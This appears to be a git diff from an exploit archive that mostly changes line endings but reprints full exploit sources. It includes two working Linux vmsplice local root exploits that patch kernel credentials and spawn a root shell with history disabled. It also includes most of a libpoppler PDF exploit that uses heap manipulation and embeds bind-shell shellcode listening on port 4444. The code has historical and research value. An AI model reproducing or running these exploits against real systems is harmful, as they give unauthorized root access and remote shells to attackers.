- printf("[+] page: 0x%lx\n", pages[1]); - - pages[0]->flags = 1 << PG_compound; - pages[0]->private = (unsigned long) pages[0]; - pages[0]->count = 1; - pages[1]->lru.next = (long) kernel_code; - - /*****/ - pages[2] = *(void **) pages[0]; - pages[3] = pages[2] + 1; - - map_size = PAGE_SIZE; - map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, - MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 
0x%lx\n", map_addr, map_addr + map_size); - printf("[+] page: 0x%lx\n", pages[2]); - printf("[+] page: 0x%lx\n", pages[3]); - - pages[2]->flags = 1 << PG_compound; - pages[2]->private = (unsigned long) pages[2]; - pages[2]->count = 1; - pages[3]->lru.next = (long) kernel_code; - - /*****/ - pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; - map_size = PAGE_SIZE; - map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, - MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); - printf("[+] page: 0x%lx\n", pages[4]); - - /*****/ - map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; - map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, - MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - if (map_addr == MAP_FAILED) - die("mmap", errno); - - memset(map_addr, 0, map_size); - printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); - - /*****/ - map_size -= 2 * PAGE_SIZE; - if (munmap(map_addr + map_size, PAGE_SIZE) < 0) - die("munmap", errno); - - /*****/ - if (pipe(pi) < 0) die("pipe", errno); - close(pi[0]); - - iov.iov_base = map_addr; - iov.iov_len = ULONG_MAX; - - signal(SIGPIPE, exit_code); - _vmsplice(pi[1], &iov, 1, 0); - die("vmsplice", errno); - return 0; -} - -// milw0rm.com [2008-02-09] +/* + * jessica_biel_naked_in_my_bed.c + * + * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. + * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. + * Stejnak je to stare jak cyp a aj jakesyk rozbite. + * + * Linux vmsplice Local Root Exploit + * By qaaz + * + * Linux 2.6.17 - 2.6.24.1 + * + * This is quite old code and I had to rewrite it to even compile. + * It should work well, but I don't remeber original intent of all + * the code, so I'm not 100% sure about it. 
You've been warned ;) + * + * -static -Wno-format + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define __KERNEL__ +#include + +#define PIPE_BUFFERS 16 +#define PG_compound 14 +#define uint unsigned int +#define static_inline static inline __attribute__((always_inline)) +#define STACK(x) (x + sizeof(x) - 40) + +struct page { + unsigned long flags; + int count; + int mapcount; + unsigned long private; + void *mapping; + unsigned long index; + struct { long next, prev; } lru; +}; + +void exit_code(); +char exit_stack[1024 * 1024]; + +void die(char *msg, int err) +{ + printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); + fflush(stdout); + fflush(stderr); + exit(1); +} + +#if defined (__i386__) + +#ifndef __NR_vmsplice +#define __NR_vmsplice 316 +#endif + +#define USER_CS 0x73 +#define USER_SS 0x7b +#define USER_FL 0x246 + +static_inline +void exit_kernel() +{ + __asm__ __volatile__ ( + "movl %0, 0x10(%%esp) ;" + "movl %1, 0x0c(%%esp) ;" + "movl %2, 0x08(%%esp) ;" + "movl %3, 0x04(%%esp) ;" + "movl %4, 0x00(%%esp) ;" + "iret" + : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), + "i" (USER_CS), "r" (exit_code) + ); +} + +static_inline +void * get_current() +{ + unsigned long curr; + __asm__ __volatile__ ( + "movl %%esp, %%eax ;" + "andl %1, %%eax ;" + "movl (%%eax), %0" + : "=r" (curr) + : "i" (~8191) + ); + return (void *) curr; +} + +#elif defined (__x86_64__) + +#ifndef __NR_vmsplice +#define __NR_vmsplice 278 +#endif + +#define USER_CS 0x23 +#define USER_SS 0x2b +#define USER_FL 0x246 + +static_inline +void exit_kernel() +{ + __asm__ __volatile__ ( + "swapgs ;" + "movq %0, 0x20(%%rsp) ;" + "movq %1, 0x18(%%rsp) ;" + "movq %2, 0x10(%%rsp) ;" + "movq %3, 0x08(%%rsp) ;" + "movq %4, 0x00(%%rsp) ;" + "iretq" + : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), + "i" (USER_CS), "r" (exit_code) + ); +} + +static_inline +void * get_current() +{ + unsigned 
long curr; + __asm__ __volatile__ ( + "movq %%gs:(0), %0" + : "=r" (curr) + ); + return (void *) curr; +} + +#else +#error "unsupported arch" +#endif + +#if defined (_syscall4) +#define __NR__vmsplice __NR_vmsplice +_syscall4( + long, _vmsplice, + int, fd, + struct iovec *, iov, + unsigned long, nr_segs, + unsigned int, flags) + +#else +#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) +#endif + +static uint uid, gid; + +void kernel_code() +{ + int i; + uint *p = get_current(); + + for (i = 0; i < 1024-13; i++) { + if (p[0] == uid && p[1] == uid && + p[2] == uid && p[3] == uid && + p[4] == gid && p[5] == gid && + p[6] == gid && p[7] == gid) { + p[0] = p[1] = p[2] = p[3] = 0; + p[4] = p[5] = p[6] = p[7] = 0; + p = (uint *) ((char *)(p + 8) + sizeof(void *)); + p[0] = p[1] = p[2] = ~0; + break; + } + p++; + } + + exit_kernel(); +} + +void exit_code() +{ + if (getuid() != 0) + die("wtf", 0); + + printf("[+] root\n"); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + die("/bin/bash", errno); +} + +int main(int argc, char *argv[]) +{ + int pi[2]; + size_t map_size; + char * map_addr; + struct iovec iov; + struct page * pages[5]; + + uid = getuid(); + gid = getgid(); + setresuid(uid, uid, uid); + setresgid(gid, gid, gid); + + printf("-----------------------------------\n"); + printf(" Linux vmsplice Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("-----------------------------------\n"); + + if (!uid || !gid) + die("!@#$", 0); + + /*****/ + pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; + pages[1] = pages[0] + 1; + + map_size = PAGE_SIZE; + map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 
0x%lx\n", map_addr, map_addr + map_size); + printf("[+] page: 0x%lx\n", pages[0]); + printf("[+] page: 0x%lx\n", pages[1]); + + pages[0]->flags = 1 << PG_compound; + pages[0]->private = (unsigned long) pages[0]; + pages[0]->count = 1; + pages[1]->lru.next = (long) kernel_code; + + /*****/ + pages[2] = *(void **) pages[0]; + pages[3] = pages[2] + 1; + + map_size = PAGE_SIZE; + map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); + printf("[+] page: 0x%lx\n", pages[2]); + printf("[+] page: 0x%lx\n", pages[3]); + + pages[2]->flags = 1 << PG_compound; + pages[2]->private = (unsigned long) pages[2]; + pages[2]->count = 1; + pages[3]->lru.next = (long) kernel_code; + + /*****/ + pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; + map_size = PAGE_SIZE; + map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); + printf("[+] page: 0x%lx\n", pages[4]); + + /*****/ + map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; + map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (map_addr == MAP_FAILED) + die("mmap", errno); + + memset(map_addr, 0, map_size); + printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); + + /*****/ + map_size -= 2 * PAGE_SIZE; + if (munmap(map_addr + map_size, PAGE_SIZE) < 0) + die("munmap", errno); + + /*****/ + if (pipe(pi) < 0) die("pipe", errno); + close(pi[0]); + + iov.iov_base = map_addr; + iov.iov_len = ULONG_MAX; + + signal(SIGPIPE, exit_code); + _vmsplice(pi[1], &iov, 1, 0); + die("vmsplice", errno); + return 0; +} + +// milw0rm.com [2008-02-09] 
diff --git a/platforms/linux/local/5093.c b/platforms/linux/local/5093.c
index f56121c29..67747d023 100755
--- a/platforms/linux/local/5093.c
+++ b/platforms/linux/local/5093.c
@@ -1,147 +1,147 @@ -/* - * diane_lane_fucked_hard.c - * - * Linux vmsplice Local Root Exploit - * By qaaz - * - * Linux 2.6.23 - 2.6.24 - */ -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include - -#define TARGET_PATTERN " sys_vm86old" -#define TARGET_SYSCALL 113 - -#ifndef __NR_vmsplice -#define __NR_vmsplice 316 -#endif - -#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) -#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) - -#define TRAMP_CODE (void *) trampoline -#define TRAMP_SIZE ( sizeof(trampoline) - 1 ) - -unsigned char trampoline[] = -"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ -"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ -"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ -"\x75\x02" /* jne +2 */ -"\xff\xd1" /* call *%ecx */ -"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ -"\xc3" /* ret */ -; - -void die(char *msg, int err) -{ - printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); - fflush(stdout); - fflush(stderr); - exit(1); -} - -long get_target() -{ - FILE *f; - long addr = 0; - char line[128]; - - f = fopen("/proc/kallsyms", "r"); - if (!f) die("/proc/kallsyms", errno); - - while (fgets(line, sizeof(line), f)) { - if (strstr(line, TARGET_PATTERN)) { - addr = strtoul(line, NULL, 16); - break; - } - } - - fclose(f); - return addr; -} - -static inline __attribute__((always_inline)) -void * get_current() -{ - unsigned long curr; - __asm__ __volatile__ ( - "movl %%esp, %%eax ;" - "andl %1, %%eax ;" - "movl (%%eax), %0" - : "=r" (curr) - : "i" (~8191) - ); - return (void *) curr; -} - -static uint uid, gid; - -void kernel_code() -{ - int i; - uint *p = get_current(); - - for (i = 0; i < 1024-13; i++) { - if (p[0] == uid && p[1] == uid && - p[2] == uid && p[3] == uid && - p[4] == gid && p[5] == gid && - p[6] == gid && p[7] == gid) { - p[0] = p[1] = p[2] = p[3] = 0; - p[4] = p[5] = p[6] = p[7] = 0; - p = (uint *) ((char *)(p + 8) + sizeof(void *)); - p[0] = p[1] = p[2] 
= ~0; - break; - } - p++; - } -} - -int main(int argc, char *argv[]) -{ - int pi[2]; - long addr; - struct iovec iov; - - uid = getuid(); - gid = getgid(); - setresuid(uid, uid, uid); - setresgid(gid, gid, gid); - - printf("-----------------------------------\n"); - printf(" Linux vmsplice Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("-----------------------------------\n"); - - if (!uid || !gid) - die("!@#$", 0); - - addr = get_target(); - printf("[+] addr: 0x%lx\n", addr); - - if (pipe(pi) < 0) - die("pipe", errno); - - iov.iov_base = (void *) addr; - iov.iov_len = TRAMP_SIZE; - - write(pi[1], TRAMP_CODE, TRAMP_SIZE); - _vmsplice(pi[0], &iov, 1, 0); - - gimmeroot(); - - if (getuid() != 0) - die("wtf", 0); - - printf("[+] root\n"); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - die("/bin/bash", errno); - return 0; -} - -// milw0rm.com [2008-02-09] +/* + * diane_lane_fucked_hard.c + * + * Linux vmsplice Local Root Exploit + * By qaaz + * + * Linux 2.6.23 - 2.6.24 + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +#define TARGET_PATTERN " sys_vm86old" +#define TARGET_SYSCALL 113 + +#ifndef __NR_vmsplice +#define __NR_vmsplice 316 +#endif + +#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) +#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) + +#define TRAMP_CODE (void *) trampoline +#define TRAMP_SIZE ( sizeof(trampoline) - 1 ) + +unsigned char trampoline[] = +"\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ +"\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ +"\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ +"\x75\x02" /* jne +2 */ +"\xff\xd1" /* call *%ecx */ +"\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ +"\xc3" /* ret */ +; + +void die(char *msg, int err) +{ + printf(err ? 
"[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); + fflush(stdout); + fflush(stderr); + exit(1); +} + +long get_target() +{ + FILE *f; + long addr = 0; + char line[128]; + + f = fopen("/proc/kallsyms", "r"); + if (!f) die("/proc/kallsyms", errno); + + while (fgets(line, sizeof(line), f)) { + if (strstr(line, TARGET_PATTERN)) { + addr = strtoul(line, NULL, 16); + break; + } + } + + fclose(f); + return addr; +} + +static inline __attribute__((always_inline)) +void * get_current() +{ + unsigned long curr; + __asm__ __volatile__ ( + "movl %%esp, %%eax ;" + "andl %1, %%eax ;" + "movl (%%eax), %0" + : "=r" (curr) + : "i" (~8191) + ); + return (void *) curr; +} + +static uint uid, gid; + +void kernel_code() +{ + int i; + uint *p = get_current(); + + for (i = 0; i < 1024-13; i++) { + if (p[0] == uid && p[1] == uid && + p[2] == uid && p[3] == uid && + p[4] == gid && p[5] == gid && + p[6] == gid && p[7] == gid) { + p[0] = p[1] = p[2] = p[3] = 0; + p[4] = p[5] = p[6] = p[7] = 0; + p = (uint *) ((char *)(p + 8) + sizeof(void *)); + p[0] = p[1] = p[2] = ~0; + break; + } + p++; + } +} + +int main(int argc, char *argv[]) +{ + int pi[2]; + long addr; + struct iovec iov; + + uid = getuid(); + gid = getgid(); + setresuid(uid, uid, uid); + setresgid(gid, gid, gid); + + printf("-----------------------------------\n"); + printf(" Linux vmsplice Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("-----------------------------------\n"); + + if (!uid || !gid) + die("!@#$", 0); + + addr = get_target(); + printf("[+] addr: 0x%lx\n", addr); + + if (pipe(pi) < 0) + die("pipe", errno); + + iov.iov_base = (void *) addr; + iov.iov_len = TRAMP_SIZE; + + write(pi[1], TRAMP_CODE, TRAMP_SIZE); + _vmsplice(pi[0], &iov, 1, 0); + + gimmeroot(); + + if (getuid() != 0) + die("wtf", 0); + + printf("[+] root\n"); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + die("/bin/bash", errno); + return 0; +} + +// milw0rm.com [2008-02-09] 
diff --git a/platforms/linux/local/586.c b/platforms/linux/local/586.c
index f4d9a27c7..3861c0895 100755
--- a/platforms/linux/local/586.c
+++ b/platforms/linux/local/586.c
@@ -66,6 +66,6 @@ void nopea (void) {
 bzero (payload,sizeof(payload));
 memset (payload,0x90,sizeof(payload)-1);
 memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code));
-}
-
-// milw0rm.com [2004-10-20]
+}
+
+// milw0rm.com [2004-10-20]
diff --git a/platforms/linux/local/587.c b/platforms/linux/local/587.c
index 08f80a3e5..2564b9169 100755
--- a/platforms/linux/local/587.c
+++ b/platforms/linux/local/587.c
@@ -160,6 +160,6 @@ sprintf(html,HTML_FORMAT,evilbuf);
 printf("%s",html);
 return 0;
-}
-
-// milw0rm.com [2004-10-21]
+}
+
+// milw0rm.com [2004-10-21]
diff --git a/platforms/linux/local/591.c b/platforms/linux/local/591.c
index f42900328..a2787bef6 100755
--- a/platforms/linux/local/591.c
+++ b/platforms/linux/local/591.c
@@ -106,6 +106,6 @@ int check(unsigned long addr) {
 addr = addr + 256;
 return addr;
-}
-
-// milw0rm.com [2004-10-23]
+}
+
+// milw0rm.com [2004-10-23]
diff --git a/platforms/linux/local/600.c b/platforms/linux/local/600.c
index 9b403f0ce..ce0531c48 100755
--- a/platforms/linux/local/600.c
+++ b/platforms/linux/local/600.c
@@ -162,6 +162,6 @@ int main(int argc, char **argv)
 close(fd);
 return 0;
-}
-
-// milw0rm.com [2004-10-26]
+}
+
+// milw0rm.com [2004-10-26]
diff --git a/platforms/linux/local/601.c b/platforms/linux/local/601.c
index a7e3920cf..8d65c3653 100755
--- a/platforms/linux/local/601.c
+++ b/platforms/linux/local/601.c
@@ -75,6 +75,6 @@ int main(int argc, char **argv)
 xmlNanoFTPNewCtxt(buf);
 return EXIT_SUCCESS;
-}
-
-// milw0rm.com [2004-10-26]
+}
+
+// milw0rm.com [2004-10-26]
diff --git a/platforms/linux/local/6032.py b/platforms/linux/local/6032.py
index a3b6c837b..6e8e888aa 100755
--- a/platforms/linux/local/6032.py
+++ b/platforms/linux/local/6032.py
@@ -1,550 +1,550 @@ -########################################################################## -#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar #### -#### updates in http://felipe.andres.manzano.googlepages.com/home #### -########################################################################## -''' - - -Sumary: -======= - -The libpoppler pdf rendering library, can free uninitialized pointers, -leading to arbitrary code execution. This vulnerability results from -memory management bugs in the Page class constructor/destructor. - - -Technical Description - Exploit/Concept Code: -============================================= - -Tests were performed using libpoppler util pdftotext taken from -git://git.freedesktop.org/git/poppler/poppler. -Other version where tried succesfully (the ones shiped with -debian/gentoo). - -In the initialization of a Page object and under certain conditions a -member object skips initialization, but then is eventualy deleted. This -can be conducted to the situation in which an arbitrary pointer is -passed to the libc free and so the it gets apropiate for the malloc -maleficarum to enter the scene. - -Look at the Page class constructor on Page.cc:231. First at the begining -of the function the member object pageWidgets isnt initialized then it -tries to check if the type of the annotations proposed on the pdf file -ar correct; if not it bails out to the label err2. Note that is some -incorcondance on the type of the anotation arise the member variable -pageWidgets is never initialized! - -Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { - Object tmp; -[...] 
- // annotations - pageDict->lookupNF("Annots", &annots); - if (!(annots.isRef() || annots.isArray() || annots.isNull())) { - error(-1, "Page annotations object (page %d) is wrong type (%s)", - num, annots.getTypeName()); - annots.free(); - goto err2; - } - - // forms - pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form); - tmp.free(); -[...] - err2: - annots.initNull(); - err1: - contents.initNull(); - ok = gFalse; -} - -But in the Page class destructor, Page.cc:309, pageWidgets is deleted -without any consideration. The Page destructor is inmediatelly called -after the erroneous Page construction. - -Page::~Page() { - delete pageWidgets; - delete attrs; - annots.free(); - contents.free(); -} - - -It is worth mentioning that the pdf rendering scenario is friendly with -the heap massage technics because you will find lots of ways to allocate -or allocate/free memory in the already probided functionality. In the -POC I have used repetidely the 'name' of the fields of a pdf dictionary -to allocate memory. Each name allocates up to 127bytes and apparently -there is no limit in the number of fields. - - -The following excerpt is a sample verification of the existence of -the problem : - -localhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf -localhost expl-poppler # pdftotext test.pdf -Error: PDF file is damaged - attempting to reconstruct xref table... 
-Error: Annotation rectangle is wrong type -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Page annotations object (page 3) is wrong type (integer) -Error: Page count in top-level pages object is incorrect -Error: Couldnt read page catalog -Trace/breakpoint trap - -:) - - -Further research should be done to accomodate the heap for other applications like evince: -localhost expl-poppler # evince test.pdf - -(evince:8912): GnomeUI-WARNING **: While connecting to session manager: -Authentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed. - -** (evince:8912): WARNING **: Service registration failed. - -** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. -Error: PDF file is damaged - attempting to reconstruct xref table... -Error: Annotation rectangle is wrong type -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Bad bounding box for annotation -Error: Page annotations object (page 3) is wrong type (integer) -*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 *** - -Note that 0x08100468 is still a provided pointer. But in this try some -malloc structure like _heap_info (see. house of mind) is not correctly -aligned any more. Maybe evince-thumbnailer which is (probably -monothreaded) is an easier target. 
- - -Patch -===== - -diff --git a/poppler/Page.cc b/poppler/Page.cc -index b28a3ee..72a706b 100644 ---- a/poppler/Page.cc -+++ b/poppler/Page.cc -@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { - - Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { - Object tmp; -- -+ pageWidgets = NULL; //Security fix - ok = gTrue; - xref = xrefA; - num = numA; - - -POC: -=== - -Written in pyploit. It can be used 2 ways , one selecting a preconfigured -target like *gentoo-pdftotext* or the other in which you could pass some -malloc/free execution trace moddifing parameters. - -''' - -import struct -import struct -import math -import os - -import sys - -## print "%.400f"%d wont work :( ... so a quick double printing class -class Doubles: - def __init__(self, precision=400): - self.precision=precision - - def pdficateint(self,i1,i2): - s = struct.pack("@L",i1) + struct.pack("@L",i2) - return self.pdficatestr(s) - - def pdficate(self,s): - rslt = " " - for pos in range (0,len(s)/8): - rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" " - return rslt; - - def pdficatestr(self, s): - d = struct.unpack("d",s)[0] - rslt=" " - if(d<0.0): - rslt+="-" - d=-d - rslt+="%d."%int(math.floor(d)) - myd=math.floor(d) - scale=0.1 - nines=0 - for p in range(1,self.precision): - for i in range(1,10): - if (myd+scale*i) > d: - i-=1 - break - if i==9: - if nines>6: - return rslt - else: - nines+=1 - else: - nines=0 - rslt+=("%02d"%i)[1] - myd+=scale* i - scale=scale*0.1 - return rslt - -##From Malloc maleficarum -##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt -class HouseOfMind: - - HEAP_MAX_SIZE=(1024*1024) - JMP='\xeb' - NOP='\x90' - PAD='\x00' - PREV_INUSE=0x1 - IS_MMAPPED=0x2 - NON_MAIN_ARENA=0x4 - def __init__(self, base, where, payload, entrypoint): - self.base=base - self.where=where-0xc - self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1) - self.payload=payload - 
self.entrypoint=entrypoint - self.chunkaddress=0 - if (self.entrypoint > 0xff - 8): - throw - -## lendian, 32bit only -## See The Malloc Maleficarum / House of Mind - def mind(self): - rslt = "" - #first we add padding to reach the next Heap border - rslt+=self.PAD*(self.heap_info-self.base) - - #now we add a _heap_info pinting to a malloc_state of our own - #and dictating a generous size for this *heap* - ##arena.c:59 //struct _heap_info - rslt += struct.pack(" unlocked. - rslt += struct.pack(" +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | Size of previous chunk, if allocated | | -# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | Size of chunk, in bytes |M|P| -# mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | User data starts here... . -# . . -# . (malloc_usable_size() bytes) . -# . | -#nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ -# | Size of chunk | -# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ - - - #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa! 
-# rslt += struct.pack(">\nstream...\nendstream\n"])) - catalog = PDFDict() - catalog.add("Type", PDFName("Catalog")) - catalog.add("Outlines", "3 0 R") - catalog.add("Pages", "4 0 R") - catalog.add("AcroForm", "<>") - - #for i in range(0,1000): - # catalog.add( "C"*82 + "%05d"%i, 0) - - outlines = PDFDict() - outlines.add("Type", PDFName("Outlines")) - outlines.add("Count",0) - - pages = PDFDict() - pages.add("Type", PDFName("Pages")) - pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]") - pages.add("Count","3") - - doc.add(PDFObject([catalog])) - doc.add(PDFObject([outlines])) - doc.add(PDFObject([pages])) - - page1 = PDFDict() - page1.add("Type", PDFName("Page")) - page1.add("Parent", "4 0 R") - page1.add("MediaBox","[ 0 0 612 792 ]") - page1.add("Contents", "1 0 R") - page1.add("Resources", "<< /ProcSet 6 0 R >>") - page1.add("Annots", "0") - - #malloc-fill-free lots of chunks of the size then used by Page class(88) - for pagesize in range(88,126): - payload = ("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i]) for i in range (0,4)]))*19 - payload += "B"*(pagesize-(len(payload)/3)) - for i in range(0,10): - page1.add(payload, 0) - - doc.add(PDFObject([page1])) - - page1 = PDFDict() - page1.add("Type", PDFName("Page")) - page1.add("Parent", "4 0 R") - page1.add("MediaBox","[ 0 0 612 792 ]") - page1.add("Contents", "1 0 R") - page1.add("Resources", "<< /ProcSet 6 0 R >>") - page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]") - - #massage session 1 - size=127 - for i in range(0,massage[0]): - page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size) - - doc.add(PDFObject([page1])) - annots = PDFDict() - annots.add("Subtype","/Text") - - annots.add("BS", "<? 
- "0.0 "*massage[2] + " ]>>") - - annots.add("FT", "/Tx") - doc.add(PDFObject([annots])) - - page1 = PDFDict() - page1.add("Type", PDFName("Page")) - page1.add("Parent", "4 0 R") - page1.add("MediaBox","[ 0 0 612 792 ]") - page1.add("Contents", "1 0 R") - page1.add("Resources", "<< /ProcSet 6 0 R >>") - page1.add("Annots", "[7 0 R]") - doc.add(PDFObject([page1])) - doc.add(PDFObject(["<<>>"])) - doc.add(PDFObject(["[ /PDF ]"])) - return doc.__str__() - - -##Main -## Not every shellcode will work by now -## Only the ones that taken by 8bytes form an ieee754 double presicion float -## with an exponent not too positive ... :) - -## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com -scode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" -scode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" -scode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" -scode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" -scode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" -scode += "\x89\xe1\xcd\x80" - -#expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2)) -expl = PopplerExpl(scode) - -targets = { - "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400), - "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400), - "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200), - -} - -if len( sys.argv )==1: - print "Comments -> fmanzano@fceia.unr.edu.ar" - print "Usage 1:" - print " %s "%sys.argv[0], targets.keys() - print "Usage 2:" - print " %s massage1 massage2 massage3 base got"%sys.argv[0] - print " The idea here is to align the _heap_info struct that commences with 0x08?00010 " - print " to the address 0x8?0000. For this pourpose move massage1/2/3. " - print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !" 
- print " base is the 1024*1024 bytes aligned address to which we are trying to align everything" - print " got is the addres of the got where the thing is going to write the shellcode address" - print " BTW by now the shellcode is nop;int 3;nop...grooovy!.. NOT" -elif len( sys.argv )>2: - print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) -else: - #base: the expected heap limit (08100000,08200000,....08f00000... ) - #got: address of the got entry to change - #chinesse massage - base,got,massage1,massage2,massage3 = targets[sys.argv[1]] - print expl.make(base,got,(massage1,massage2,massage3)) - -# milw0rm.com [2008-07-08] +########################################################################## +#### Felipe Andres Manzano * fmanzano@fceia.unr.edu.ar #### +#### updates in http://felipe.andres.manzano.googlepages.com/home #### +########################################################################## +''' + + +Sumary: +======= + +The libpoppler pdf rendering library, can free uninitialized pointers, +leading to arbitrary code execution. This vulnerability results from +memory management bugs in the Page class constructor/destructor. + + +Technical Description - Exploit/Concept Code: +============================================= + +Tests were performed using libpoppler util pdftotext taken from +git://git.freedesktop.org/git/poppler/poppler. +Other version where tried succesfully (the ones shiped with +debian/gentoo). + +In the initialization of a Page object and under certain conditions a +member object skips initialization, but then is eventualy deleted. This +can be conducted to the situation in which an arbitrary pointer is +passed to the libc free and so the it gets apropiate for the malloc 